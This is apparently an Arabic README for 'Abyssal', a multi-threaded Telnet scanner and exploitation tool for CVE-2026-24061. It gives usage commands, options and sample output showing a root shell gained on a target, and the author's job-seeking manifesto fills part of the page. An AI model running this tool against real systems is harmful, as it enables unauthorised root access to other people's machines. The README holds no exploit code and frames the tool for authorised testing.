
Abyssal هو ماسح ضوئي عالي الأداء لثغرات Telnet لـ CVE-2026-24061، يوفر قشرة جذر على الأنظمة الضعيفة مع اكتشاف النتائج الإيجابية الخاطئة.
CVE-2026-24061 ماسح ثغرات Telnet وأداة استغلال
من الأعماق، ننهض.
متعدد الخيوط، كشف الإيجابيات الزائفة، شل جذر تفاعلي عند النجاح.
تم بناء هذا المشروع بواسطة محترف تقني ذو خبرة لعقود في العمل العملي في أمن الشبكات والبنية التحتية وتطوير البرمجيات. في الخامسة والخمسين، أبحث بنشاط عن فرص جديدة - سواء كموظف بدوام كامل، أو مستقل، أو متعاون في المشاريع. إذا كنت تقدر الخبرة والمعرفة التقنية العميقة والنهج العملي لحل المشكلات، تواصل معي.
📫 أنا منفتح على عروض العمل في جميع أنحاء العالم.
✉️ الاتصال: [[email protected]]
📖 الاستخدام
مسح أساسي (غير تفاعلي)
python3 abyssal.py -f targets.txt
الوضع التفاعلي (الحصول على شل عند النجاح)
python3 abyssal.py -f targets.txt --interactive
خيارات متقدمة
python3 abyssal.py -f targets.txt -t 20 --interactive -o scan.log
خيارات سطر الأوامر
| الخيار | الوصف |
|---|---|
-f, --file | ملف بعناوين IP (الافتراضي: ip_list.txt) |
-t, --threads | عدد الخيوط المتوازية (الافتراضي: 10) |
-i, --interactive | الوضع التفاعلي — الحصول على شل على الأنظمة الضعيفة |
-o, --output | اسم ملف السجل (يتم إنشاؤه تلقائياً إذا لم يُحدد) |
-c, --connect-timeout | مهلة الاتصال بالثواني (الافتراضي: 5) |
-s, --session-timeout | مهلة الجلسة بالثواني (الافتراضي: 10) |
--version | عرض معلومات الإصدار |
-h, --help | عرض رسالة المساعدة |
📂 تنسيق ملف الأهداف أنشئ ملفًا بهدف واحد في كل سطر:
# عناوين IP مفردة
192.168.1.100
10.0.0.50
# IP مع منفذ مخصص
192.168.1.200:2323
# شبكة فرعية (CIDR) — الدعم قادم قريبًا
# 192.168.1.0/24
# التعليقات مسموح بها
172.16.1.25 # خادم المكتب
📊 مثال الإخراج
╔═══════════════════════════════════════════════════════════════════════════════╗
║ ║
║ █████╗ ██████╗ ██╗ ██╗███████╗███████╗ █████╗ ██╗ ║
║ ██╔══██╗██╔══██╗╚██╗ ██╔╝██╔════╝██╔════╝██╔══██╗██║ ║
║ ███████║██████╔╝ ╚████╔╝ ███████╗███████╗███████║██║ ║
║ ██╔══██║██╔══██╗ ╚██╔╝ ╚════██║╚════██║██╔══██║██║ ║
║ ██║ ██║██████╔╝ ██║ ███████║███████║██║ ██║███████╗ ║
║ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ║
║ ║
║ Abyssal - CVE-2026-24061 Telnet Vulnerability Scanner ║
║ "From the depths, we rise." ║
║ ║
║ Built by: Klaus Baumdick ║
║ Contact: [email protected] ║
║ Status: Open for new opportunities worldwide ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════╝
⚠️ INTERACTIVE MODE ENABLED!
On REAL login prompt or shell, control will be passed to you.
False positives are automatically detected and ignored.
Press CTRL+C to abort.
Starting scan with 10 parallel threads
Total: 100 targets to test
============================================================
🎯 REAL ROOT SHELL (#) ON 192.168.1.100:23 OBTAINED!
============================================================
>>> You now have shell access!
>>> Execute any commands (whoami, id, ls, etc.)
>>> Type 'exit' or press CTRL+C to close
------------------------------------------------------------
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# exit
[*] Session on 192.168.1.100:23 closed.
============================================================
SCAN COMPLETED
============================================================
Duration: 45.23 seconds
Targets tested: 100
📊 SUMMARY:
✅ REAL VULNERABLE: 15
🔒 PROTECTED: 42
❓ FAILED: 23
🌐 UNREACHABLE: 20
⚠️ FALSE POSITIVES: 0
🚨 SECURITY WARNING:
15 system(s) are REALLY vulnerable to CVE-2026-24061!
→ Disable or patch Telnet immediately!
→ Use SSH as a secure alternative!
⚠️ إخلاء مسؤولية هذه الأداة مخصصة لاختبار الأمن المصرح به والأغراض التعليمية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه الأداة. استخدمها بمسؤولية وعلى مسؤوليتك الخاصة.
📝 الترخيص هذا المشروع مرخص بموجب رخصة MIT — راجع ملف LICENSE للتفاصيل.
🤝 التواصل
Klaus Baumdick 📫 البريد الإلكتروني: [email protected] 🔗 GitHub: github.com/stoerti2 📌 الحالة: منفتح على فرص جديدة في جميع أنحاء العالم
📚 المراجع
git clone https://github.com/stoerti2/abyssal.git#┌────────────────────────────────────────────────────────────────────────┐
#│ │
#│ ███████╗████████╗ ██████╗ ███████╗██████╗ ████████╗██╗ │
#│ ██╔════╝╚══██╔══╝██╔═══██╗██╔════╝██╔══██╗╚══██╔══╝██║ │
#│ ███████╗ ██║ ██║ ██║█████╗ ██████╔╝ ██║ ██║ │
#│ ╚════██║ ██║ ██║ ██║██╔══╝ ██╔══██╗ ██║ ██║ │
#│ ███████║ ██║ ╚██████╔╝███████╗██║ ██║ ██║ ██║ │
#│ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝ │
#│ │
#│ "old school, still root" │
#│ "stoerti - the jobless hacker" │
#│ │
#│ ┌──────────────────────────────────────────────────────────────┐ │
#│ │ 40 years in the trenches. │ 6 months unemployed in DE. │ │
#│ │ They fired the one who knew. │ This is my legacy. │ │
#│ │ -- no patches for reality -- │ │
#│ └──────────────────────────────────────────────────────────────┘ │
#│ │
#└────────────────────────────────────────────────────────────────────────┘
ما هو Grindware؟
Grindware هو برمجيات توجد لأن لا أحد يدفع لي لبناء الأشياء التي تهم حقًا.
لقد كنت عاطلاً عن العمل لمدة ستة أشهر. ليس لأنني لا أستطيع البرمجة - ولكن لأن السوق لم يعد يهتم بالمهارات. يهتم بالكلمات الرنانة والشهادات ومن تعرفه. لذا بدلاً من انتظار وظيفة لا تأتي أبدًا، أبني.
Grindware هو نتيجة لذلك.
لأن هذا ما هو عليه. كود كُتب أثناء المعاناة. أثناء الليالي المتأخرة. أثناء رفض الوظيفة رقم 47. أثناء اللحظات التي تدرك فيها أن النظام لا يهتم بك، لذا قد تبني نظامك الخاص.
Grindware هو كود البقاء.
Grindware هو مجرد كود. من مطور عاطل إلى العالم.
إذا كنت تستخدم Grindware، فهذا يكفي. إذا كنت تريد دعمه، يمكنك:
أنا دائمًا منفتح على العمل. إذا كنت بحاجة إلى مطور يبني الأشياء فعلاً، فلنتحدث.
Grindware – مبني في المعاناة، يُطلق مجانًا.
للاستفسارات أو الأسئلة بخصوص مجموعة البيانات هذه، يرجى الاتصال بـ [email protected]
آخر تحديث: يوليو 2026